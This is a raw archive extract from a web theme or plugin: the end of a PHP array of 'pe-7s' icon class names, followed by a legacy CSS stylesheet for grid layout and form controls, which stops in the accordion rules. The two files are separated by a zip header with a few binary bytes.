		'pe-7s-way',
		'pe-7s-close-circle',
		'pe-7s-id'=>'pe-7s-id',
		'pe-7s-angle-up',
		'pe-7s-wristwatch',
		'pe-7s-angle-up-circle',
		'pe-7s-world',
		'pe-7s-angle-right',
		'pe-7s-angle-right-circle',
		'pe-7s-users',
		'pe-7s-angle-left',
		'pe-7s-user-female',
		'pe-7s-angle-left-circle',
		'pe-7s-up-arrow',
		'pe-7s-angle-down',
		'pe-7s-switch',
		'pe-7s-angle-down-circle',
		'pe-7s-scissors',
		'pe-7s-wallet',
		'pe-7s-safe',
		'pe-7s-volume',
		'pe-7s-volume2',
		'pe-7s-volume1',
		'pe-7s-voicemail',
		'pe-7s-video',
		'pe-7s-user',
		'pe-7s-upload',
		'pe-7s-unlock',
		'pe-7s-umbrella',
		'pe-7s-trash',
		'pe-7s-tools',
		'pe-7s-timer',
		'pe-7s-ticket',
		'pe-7s-target',
		'pe-7s-sun',
		'pe-7s-study',
		'pe-7s-stopwatch',
		'pe-7s-star',
		'pe-7s-speaker',
		'pe-7s-signal',
		'pe-7s-shuffle',
		'pe-7s-shopbag',
		'pe-7s-share',
		'pe-7s-server',
		'pe-7s-search',
		'pe-7s-film',
		'pe-7s-science',
		'pe-7s-disk',
		'pe-7s-ribbon',
		'pe-7s-repeat',
		'pe-7s-refresh',
		'pe-7s-add-user',
		'pe-7s-refresh-cloud',
		'pe-7s-paperclip',
		'pe-7s-radio',
		'pe-7s-note2',
		'pe-7s-print',
		'pe-7s-network',
		'pe-7s-prev',
		'pe-7s-mute',
		'pe-7s-power',
		'pe-7s-medal',
		'pe-7s-portfolio',
		'pe-7s-like2',
		'pe-7s-plus',
		'pe-7s-left-arrow',
		'pe-7s-play',
		'pe-7s-key',
		'pe-7s-plane',
		'pe-7s-joy',
		'pe-7s-photo-gallery',
		'pe-7s-pin',
		'pe-7s-phone',
		'pe-7s-plug',
		'pe-7s-pen',
		'pe-7s-right-arrow',
		'pe-7s-paper-plane',
		'pe-7s-delete-user',
		'pe-7s-paint',
		'pe-7s-bottom-arrow',
		'pe-7s-notebook',
		'pe-7s-note',
		'pe-7s-next'=>'pe-7s-next',
		'pe-7s-news-paper',
		'pe-7s-musiclist',
		'pe-7s-music',
		'pe-7s-mouse',
		'pe-7s-more',
		'pe-7s-moon',
		'pe-7s-monitor',
		'pe-7s-micro',
		'pe-7s-menu',
		'pe-7s-map',
		'pe-7s-map-marker',
		'pe-7s-mail',
		'pe-7s-mail-open',
		'pe-7s-mail-open-file',
		'pe-7s-magnet',
		'pe-7s-loop',
		'pe-7s-look',
		'pe-7s-lock',
		'pe-7s-lintern',
		'pe-7s-link',
		'pe-7s-like',
		'pe-7s-light',
		'pe-7s-less',
		'pe-7s-keypad',
		'pe-7s-junk',
		'pe-7s-info',
		'pe-7s-home',
		'pe-7s-help2',
		'pe-7s-help1',
		'pe-7s-graph3',
		'pe-7s-graph2',
		'pe-7s-graph1',
		'pe-7s-graph',
		'pe-7s-global',
		'pe-7s-gleam',
		'pe-7s-glasses',
		'pe-7s-gift',
		'pe-7s-folder',
		'pe-7s-flag',
		'pe-7s-filter',
		'pe-7s-file',
		'pe-7s-expand1',
		'pe-7s-exapnd2',
		'pe-7s-edit',
		'pe-7s-drop',
		'pe-7s-drawer',
		'pe-7s-download',
		'pe-7s-display2',
		'pe-7s-display1',
		'pe-7s-diskette',
		'pe-7s-date',
		'pe-7s-cup',
		'pe-7s-culture',
		'pe-7s-crop',
		'pe-7s-credit',
		'pe-7s-copy-file',
		'pe-7s-config',
		'pe-7s-compass',
		'pe-7s-comment',
		'pe-7s-coffee',
		'pe-7s-cloud',
		'pe-7s-clock',
		'pe-7s-check',
		'pe-7s-chat',
		'pe-7s-cart',
		'pe-7s-camera',
		'pe-7s-call',
		'pe-7s-calculator',
		'pe-7s-browser',
		'pe-7s-box2',
		'pe-7s-box1',
		'pe-7s-bookmarks',
		'pe-7s-bicycle',
		'pe-7s-bell',
		'pe-7s-battery',
		'pe-7s-ball',
		'pe-7s-back',
		'pe-7s-attention',
		'pe-7s-anchor',
		'pe-7s-albums',
		'pe-7s-alarm',
		'pe-7s-airplay'
		);

	}

}PK!10J�ukukflex/css/legacy.cssnu&1i�.clearfix {
  *zoom: 1;
}
.clearfix:before,
.clearfix:after {
  display: table;
  content: "";
  line-height: 0;
}
.clearfix:after {
  clear: both;
}
.hide-text {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.input-block-level {
  display: block;
  width: 100%;
  min-height: 30px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.row-fluid {
  *zoom: 1;
}
.row-fluid:before,
.row-fluid:after {
  display: table;
  content: "";
  line-height: 0;
}
.row-fluid:after {
  clear: both;
}
.row-fluid [class*="span"] {
  display: block;
  width: 100%;
  min-height: 30px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  float: left;
  margin-left: 2.1276595744681%;
  *margin-left: 2.0744680851064%;
}
.row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.row-fluid .controls-row [class*="span"] + [class*="span"] {
  margin-left: 2.1276595744681%;
}
.row-fluid .span12 {
  width: 100%;
  *width: 99.946808510638%;
}
.row-fluid .span11 {
  width: 91.489361702128%;
  *width: 91.436170212766%;
}
.row-fluid .span10 {
  width: 82.978723404255%;
  *width: 82.925531914894%;
}
.row-fluid .span9 {
  width: 74.468085106383%;
  *width: 74.414893617021%;
}
.row-fluid .span8 {
  width: 65.957446808511%;
  *width: 65.904255319149%;
}
.row-fluid .span7 {
  width: 57.446808510638%;
  *width: 57.393617021277%;
}
.row-fluid .span6 {
  width: 48.936170212766%;
  *width: 48.882978723404%;
}
.row-fluid .span5 {
  width: 40.425531914894%;
  *width: 40.372340425532%;
}
.row-fluid .span4 {
  width: 31.914893617021%;
  *width: 31.86170212766%;
}
.row-fluid .span3 {
  width: 23.404255319149%;
  *width: 23.351063829787%;
}
.row-fluid .span2 {
  width: 14.893617021277%;
  *width: 14.840425531915%;
}
.row-fluid .span1 {
  width: 6.3829787234043%;
  *width: 6.3297872340426%;
}
.row-fluid .offset12 {
  margin-left: 104.25531914894%;
  *margin-left: 104.14893617021%;
}
.row-fluid .offset12:first-child {
  margin-left: 102.12765957447%;
  *margin-left: 102.02127659574%;
}
.row-fluid .offset11 {
  margin-left: 95.744680851064%;
  *margin-left: 95.63829787234%;
}
.row-fluid .offset11:first-child {
  margin-left: 93.617021276596%;
  *margin-left: 93.510638297872%;
}
.row-fluid .offset10 {
  margin-left: 87.234042553191%;
  *margin-left: 87.127659574468%;
}
.row-fluid .offset10:first-child {
  margin-left: 85.106382978723%;
  *margin-left: 85%;
}
.row-fluid .offset9 {
  margin-left: 78.723404255319%;
  *margin-left: 78.617021276596%;
}
.row-fluid .offset9:first-child {
  margin-left: 76.595744680851%;
  *margin-left: 76.489361702128%;
}
.row-fluid .offset8 {
  margin-left: 70.212765957447%;
  *margin-left: 70.106382978723%;
}
.row-fluid .offset8:first-child {
  margin-left: 68.085106382979%;
  *margin-left: 67.978723404255%;
}
.row-fluid .offset7 {
  margin-left: 61.702127659574%;
  *margin-left: 61.595744680851%;
}
.row-fluid .offset7:first-child {
  margin-left: 59.574468085106%;
  *margin-left: 59.468085106383%;
}
.row-fluid .offset6 {
  margin-left: 53.191489361702%;
  *margin-left: 53.085106382979%;
}
.row-fluid .offset6:first-child {
  margin-left: 51.063829787234%;
  *margin-left: 50.957446808511%;
}
.row-fluid .offset5 {
  margin-left: 44.68085106383%;
  *margin-left: 44.574468085106%;
}
.row-fluid .offset5:first-child {
  margin-left: 42.553191489362%;
  *margin-left: 42.446808510638%;
}
.row-fluid .offset4 {
  margin-left: 36.170212765957%;
  *margin-left: 36.063829787234%;
}
.row-fluid .offset4:first-child {
  margin-left: 34.042553191489%;
  *margin-left: 33.936170212766%;
}
.row-fluid .offset3 {
  margin-left: 27.659574468085%;
  *margin-left: 27.553191489362%;
}
.row-fluid .offset3:first-child {
  margin-left: 25.531914893617%;
  *margin-left: 25.425531914894%;
}
.row-fluid .offset2 {
  margin-left: 19.148936170213%;
  *margin-left: 19.042553191489%;
}
.row-fluid .offset2:first-child {
  margin-left: 17.021276595745%;
  *margin-left: 16.914893617021%;
}
.row-fluid .offset1 {
  margin-left: 10.63829787234%;
  *margin-left: 10.531914893617%;
}
.row-fluid .offset1:first-child {
  margin-left: 8.5106382978723%;
  *margin-left: 8.4042553191489%;
}
[class*="span"].hide,
.row-fluid [class*="span"].hide {
  display: none;
}
[class*="span"].pull-right,
.row-fluid [class*="span"].pull-right {
  float: right;
}
input,
textarea,
.uneditable-input {
  width: 206px;
}
textarea {
  height: auto;
}
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
  background-color: #fff;
  border: 1px solid #ccc;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -webkit-transition: border linear .2s, box-shadow linear .2s;
  -moz-transition: border linear .2s, box-shadow linear .2s;
  -o-transition: border linear .2s, box-shadow linear .2s;
  transition: border linear .2s, box-shadow linear .2s;
}
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.uneditable-input:focus {
  border-color: rgba(82,168,236,0.8);
  outline: 0;
  outline: thin dotted \9;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  *margin-top: 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="file"],
input[type="image"],
input[type="submit"],
input[type="reset"],
input[type="button"],
input[type="radio"],
input[type="checkbox"] {
  width: auto;
}
select,
input[type="file"] {
  height: 30px;
  *margin-top: 4px;
  line-height: 30px;
}
select {
  width: 220px;
  border: 1px solid #ccc;
  background-color: #fff;
}
select[multiple],
select[size] {
  height: auto;
}
select:focus,
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: thin dotted #333;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.uneditable-input,
.uneditable-textarea {
  color: #999;
  background-color: #fcfcfc;
  border-color: #ccc;
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
  cursor: not-allowed;
}
.uneditable-input {
  overflow: hidden;
  white-space: nowrap;
}
.uneditable-textarea {
  width: auto;
  height: auto;
}
input:-moz-placeholder,
textarea:-moz-placeholder {
  color: #999;
}
input:-ms-input-placeholder,
textarea:-ms-input-placeholder {
  color: #999;
}
input::-webkit-input-placeholder,
textarea::-webkit-input-placeholder {
  color: #999;
}
.controls > .radio:first-child,
.controls > .checkbox:first-child {
  padding-top: 5px;
}
.radio.inline,
.checkbox.inline {
  display: inline-block;
  padding-top: 5px;
  margin-bottom: 0;
  vertical-align: middle;
}
.radio.inline + .radio.inline,
.checkbox.inline + .checkbox.inline {
  margin-left: 10px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input[class*="span"],
select[class*="span"],
textarea[class*="span"],
.uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"] {
  float: none;
  margin-left: 0;
}
.input-append input[class*="span"],
.input-append .uneditable-input[class*="span"],
.input-prepend input[class*="span"],
.input-prepend .uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"],
.row-fluid .input-prepend [class*="span"],
.row-fluid .input-append [class*="span"] {
  display: inline-block;
}
input,
textarea,
.uneditable-input {
  margin-left: 0;
}
.controls-row [class*="span"] + [class*="span"] {
  margin-left: 20px;
}
input.span12,
textarea.span12,
.uneditable-input.span12 {
  width: 926px;
}
input.span11,
textarea.span11,
.uneditable-input.span11 {
  width: 846px;
}
input.span10,
textarea.span10,
.uneditable-input.span10 {
  width: 766px;
}
input.span9,
textarea.span9,
.uneditable-input.span9 {
  width: 686px;
}
input.span8,
textarea.span8,
.uneditable-input.span8 {
  width: 606px;
}
input.span7,
textarea.span7,
.uneditable-input.span7 {
  width: 526px;
}
input.span6,
textarea.span6,
.uneditable-input.span6 {
  width: 446px;
}
input.span5,
textarea.span5,
.uneditable-input.span5 {
  width: 366px;
}
input.span4,
textarea.span4,
.uneditable-input.span4 {
  width: 286px;
}
input.span3,
textarea.span3,
.uneditable-input.span3 {
  width: 206px;
}
input.span2,
textarea.span2,
.uneditable-input.span2 {
  width: 126px;
}
input.span1,
textarea.span1,
.uneditable-input.span1 {
  width: 46px;
}
.controls-row {
  *zoom: 1;
}
.controls-row:before,
.controls-row:after {
  display: table;
  content: "";
  line-height: 0;
}
.controls-row:after {
  clear: both;
}
.controls-row [class*="span"],
.row-fluid .controls-row [class*="span"] {
  float: left;
}
.controls-row .checkbox[class*="span"],
.controls-row .radio[class*="span"] {
  padding-top: 5px;
}
input[disabled],
select[disabled],
textarea[disabled],
input[readonly],
select[readonly],
textarea[readonly] {
  cursor: not-allowed;
  background-color: #eee;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"][readonly],
input[type="checkbox"][readonly] {
  background-color: transparent;
}
.control-group.warning .control-label,
.control-group.warning .help-block,
.control-group.warning .help-inline {
  color: #c09853;
}
.control-group.warning .checkbox,
.control-group.warning .radio,
.control-group.warning input,
.control-group.warning select,
.control-group.warning textarea {
  color: #c09853;
}
.control-group.warning input,
.control-group.warning select,
.control-group.warning textarea {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.warning input:focus,
.control-group.warning select:focus,
.control-group.warning textarea:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
}
.control-group.warning .input-prepend .add-on,
.control-group.warning .input-append .add-on {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.control-group.error .control-label,
.control-group.error .help-block,
.control-group.error .help-inline {
  color: #b94a48;
}
.control-group.error .checkbox,
.control-group.error .radio,
.control-group.error input,
.control-group.error select,
.control-group.error textarea {
  color: #b94a48;
}
.control-group.error input,
.control-group.error select,
.control-group.error textarea {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.error input:focus,
.control-group.error select:focus,
.control-group.error textarea:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
}
.control-group.error .input-prepend .add-on,
.control-group.error .input-append .add-on {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.control-group.success .control-label,
.control-group.success .help-block,
.control-group.success .help-inline {
  color: #468847;
}
.control-group.success .checkbox,
.control-group.success .radio,
.control-group.success input,
.control-group.success select,
.control-group.success textarea {
  color: #468847;
}
.control-group.success input,
.control-group.success select,
.control-group.success textarea {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.success input:focus,
.control-group.success select:focus,
.control-group.success textarea:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
}
.control-group.success .input-prepend .add-on,
.control-group.success .input-append .add-on {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.control-group.info .control-label,
.control-group.info .help-block,
.control-group.info .help-inline {
  color: #3a87ad;
}
.control-group.info .checkbox,
.control-group.info .radio,
.control-group.info input,
.control-group.info select,
.control-group.info textarea {
  color: #3a87ad;
}
.control-group.info input,
.control-group.info select,
.control-group.info textarea {
  border-color: #3a87ad;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.info input:focus,
.control-group.info select:focus,
.control-group.info textarea:focus {
  border-color: #2d6987;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
}
.control-group.info .input-prepend .add-on,
.control-group.info .input-append .add-on {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #3a87ad;
}
input:focus:invalid,
textarea:focus:invalid,
select:focus:invalid {
  color: #b94a48;
  border-color: #ee5f5b;
}
input:focus:invalid:focus,
textarea:focus:invalid:focus,
select:focus:invalid:focus {
  border-color: #e9322d;
  -webkit-box-shadow: 0 0 6px #f8b9b7;
  -moz-box-shadow: 0 0 6px #f8b9b7;
  box-shadow: 0 0 6px #f8b9b7;
}
.form-actions {
  padding: 19px 20px 20px;
  margin-top: 20px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border-top: 1px solid #e5e5e5;
  *zoom: 1;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: "";
  line-height: 0;
}
.form-actions:after {
  clear: both;
}
.help-block,
.help-inline {
  color: #595959;
}
.help-block {
  display: block;
  margin-bottom: 10px;
}
.help-inline {
  display: inline-block;
  *display: inline;
  *zoom: 1;
  vertical-align: middle;
  padding-left: 5px;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-append select,
.input-append .uneditable-input,
.input-append .dropdown-menu,
.input-append .popover,
.input-prepend input,
.input-prepend select,
.input-prepend .uneditable-input,
.input-prepend .dropdown-menu,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input[type="text"],
.input-append input[type="password"],
.input-append input[type="datetime"],
.input-append input[type="datetime-local"],
.input-append input[type="date"],
.input-append input[type="month"],
.input-append input[type="time"],
.input-append input[type="week"],
.input-append input[type="number"],
.input-append input[type="email"],
.input-append input[type="url"],
.input-append input[type="search"],
.input-append input[type="tel"],
.input-append input[type="color"],
.input-append .uneditable-input,
.input-prepend input[type="text"],
.input-prepend input[type="password"],
.input-prepend input[type="datetime"],
.input-prepend input[type="datetime-local"],
.input-prepend input[type="date"],
.input-prepend input[type="month"],
.input-prepend input[type="time"],
.input-prepend input[type="week"],
.input-prepend input[type="number"],
.input-prepend input[type="email"],
.input-prepend input[type="url"],
.input-prepend input[type="search"],
.input-prepend input[type="tel"],
.input-prepend input[type="color"],
.input-prepend .uneditable-input {
  width: auto;
  display: inline-block;
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  -webkit-border-radius: 0 4px 4px 0;
  -moz-border-radius: 0 4px 4px 0;
  border-radius: 0 4px 4px 0;
}
.input-append input[type="text"]:focus,
.input-append input[type="password"]:focus,
.input-append input[type="datetime"]:focus,
.input-append input[type="datetime-local"]:focus,
.input-append input[type="date"]:focus,
.input-append input[type="month"]:focus,
.input-append input[type="time"]:focus,
.input-append input[type="week"]:focus,
.input-append input[type="number"]:focus,
.input-append input[type="email"]:focus,
.input-append input[type="url"]:focus,
.input-append input[type="search"]:focus,
.input-append input[type="tel"]:focus,
.input-append input[type="color"]:focus,
.input-append .uneditable-input:focus,
.input-prepend input[type="text"]:focus,
.input-prepend input[type="password"]:focus,
.input-prepend input[type="datetime"]:focus,
.input-prepend input[type="datetime-local"]:focus,
.input-prepend input[type="date"]:focus,
.input-prepend input[type="month"]:focus,
.input-prepend input[type="time"]:focus,
.input-prepend input[type="week"]:focus,
.input-prepend input[type="number"]:focus,
.input-prepend input[type="email"]:focus,
.input-prepend input[type="url"]:focus,
.input-prepend input[type="search"]:focus,
.input-prepend input[type="tel"]:focus,
.input-prepend input[type="color"]:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 20px;
  min-height: 20px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 20px;
  text-align: center;
  text-shadow: 0 1px 0 #fff;
  background-color: #eee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .add-on,
.input-prepend .btn,
.input-prepend .btn-group > .dropdown-toggle {
  display: inline-block;
  vertical-align: top;
  -webkit-border-radius: 0;
  -moz-border-radius: 0;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #a9dba9;
  border-color: #46a546;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  -webkit-border-radius: 4px 0 0 4px;
  -moz-border-radius: 4px 0 0 4px;
  border-radius: 4px 0 0 4px;
}
.input-append input[type="text"],
.input-append input[type="password"],
.input-append input[type="datetime"],
.input-append input[type="datetime-local"],
.input-append input[type="date"],
.input-append input[type="month"],
.input-append input[type="time"],
.input-append input[type="week"],
.input-append input[type="number"],
.input-append input[type="email"],
.input-append input[type="url"],
.input-append input[type="search"],
.input-append input[type="tel"],
.input-append input[type="color"],
.input-append .uneditable-input {
  -webkit-border-radius: 4px 0 0 4px;
  -moz-border-radius: 4px 0 0 4px;
  border-radius: 4px 0 0 4px;
}
.input-append input[type="text"] + .btn-group .btn:last-child,
.input-append input[type="password"] + .btn-group .btn:last-child,
.input-append input[type="datetime"] + .btn-group .btn:last-child,
.input-append input[type="datetime-local"] + .btn-group .btn:last-child,
.input-append input[type="date"] + .btn-group .btn:last-child,
.input-append input[type="month"] + .btn-group .btn:last-child,
.input-append input[type="time"] + .btn-group .btn:last-child,
.input-append input[type="week"] + .btn-group .btn:last-child,
.input-append input[type="number"] + .btn-group .btn:last-child,
.input-append input[type="email"] + .btn-group .btn:last-child,
.input-append input[type="url"] + .btn-group .btn:last-child,
.input-append input[type="search"] + .btn-group .btn:last-child,
.input-append input[type="tel"] + .btn-group .btn:last-child,
.input-append input[type="color"] + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  -webkit-border-radius: 0 4px 4px 0;
  -moz-border-radius: 0 4px 4px 0;
  border-radius: 0 4px 4px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  -webkit-border-radius: 0 4px 4px 0;
  -moz-border-radius: 0 4px 4px 0;
  border-radius: 0 4px 4px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  -webkit-border-radius: 0;
  -moz-border-radius: 0;
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  -webkit-border-radius: 0 4px 4px 0;
  -moz-border-radius: 0 4px 4px 0;
  border-radius: 0 4px 4px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  -webkit-border-radius: 4px 0 0 4px;
  -moz-border-radius: 4px 0 0 4px;
  border-radius: 4px 0 0 4px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  -webkit-border-radius: 0 4px 4px 0;
  -moz-border-radius: 0 4px 4px 0;
  border-radius: 0 4px 4px 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
input.search-query {
  padding-right: 14px;
  padding-right: 4px \9;
  padding-left: 14px;
  padding-left: 4px \9;
  margin-bottom: 0;
  -webkit-border-radius: 15px;
  -moz-border-radius: 15px;
  border-radius: 15px;
}
.form-search .input-append .search-query,
.form-search .input-prepend .search-query {
  -webkit-border-radius: 0;
  -moz-border-radius: 0;
  border-radius: 0;
}
.form-search .input-append .search-query {
  -webkit-border-radius: 14px 0 0 14px;
  -moz-border-radius: 14px 0 0 14px;
  border-radius: 14px 0 0 14px;
}
.form-search .input-append .btn {
  -webkit-border-radius: 0 14px 14px 0;
  -moz-border-radius: 0 14px 14px 0;
  border-radius: 0 14px 14px 0;
}
.form-search .input-prepend .search-query {
  -webkit-border-radius: 0 14px 14px 0;
  -moz-border-radius: 0 14px 14px 0;
  border-radius: 0 14px 14px 0;
}
.form-search .input-prepend .btn {
  -webkit-border-radius: 14px 0 0 14px;
  -moz-border-radius: 14px 0 0 14px;
  border-radius: 14px 0 0 14px;
}
.form-search input,
.form-search textarea,
.form-search select,
.form-search .help-inline,
.form-search .uneditable-input,
.form-search .input-prepend,
.form-search .input-append,
.form-inline input,
.form-inline textarea,
.form-inline select,
.form-inline .help-inline,
.form-inline .uneditable-input,
.form-inline .input-prepend,
.form-inline .input-append,
.form-horizontal input,
.form-horizontal textarea,
.form-horizontal select,
.form-horizontal .help-inline,
.form-horizontal .uneditable-input,
.form-horizontal .input-prepend,
.form-horizontal .input-append {
  display: inline-block;
  *display: inline;
  *zoom: 1;
  margin-bottom: 0;
  vertical-align: middle;
}
.form-search .hide,
.form-inline .hide,
.form-horizontal .hide {
  display: none;
}
.form-search label,
.form-inline label,
.form-search .btn-group,
.form-inline .btn-group {
  display: inline-block;
}
.form-search .input-append,
.form-inline .input-append,
.form-search .input-prepend,
.form-inline .input-prepend {
  margin-bottom: 0;
}
.form-search .radio,
.form-search .checkbox,
.form-inline .radio,
.form-inline .checkbox {
  padding-left: 0;
  margin-bottom: 0;
  vertical-align: middle;
}
.form-search .radio input[type="radio"],
.form-search .checkbox input[type="checkbox"],
.form-inline .radio input[type="radio"],
.form-inline .checkbox input[type="checkbox"] {
  float: left;
  margin-right: 3px;
  margin-left: 0;
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
  *zoom: 1;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: "";
  line-height: 0;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-label {
  float: left;
  width: 160px;
  padding-top: 5px;
  text-align: right;
}
.form-horizontal .controls {
  *display: inline-block;
  *padding-left: 20px;
  margin-left: 180px;
  *margin-left: 0;
}
.form-horizontal .controls:first-child {
  *padding-left: 180px;
}
.form-horizontal .help-block {
  margin-bottom: 0;
}
.form-horizontal input + .help-block,
.form-horizontal select + .help-block,
.form-horizontal textarea + .help-block,
.form-horizontal .uneditable-input + .help-block,
.form-horizontal .input-prepend + .help-block,
.form-horizontal .input-append + .help-block {
  margin-top: 10px;
}
.form-horizontal .form-actions {
  padding-left: 180px;
}
.control-label .hasTooltip {
  display: inline-block;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  -webkit-border-radius: 4px;
  -moz-border-radius: 4px;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0,0,0,0.15);
}
.well-large {
  padding: 24px;
  -webkit-border-radius: 6px;
  -moz-border-radius: 6px;
  border-radius: 6px;
}
.well-small {
  padding: 9px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.accordion {
  margin-bottom: 20px;
}
.accordion-group {
  margin-bottom: 2px;
  border: 1px solid #e5e5e5;
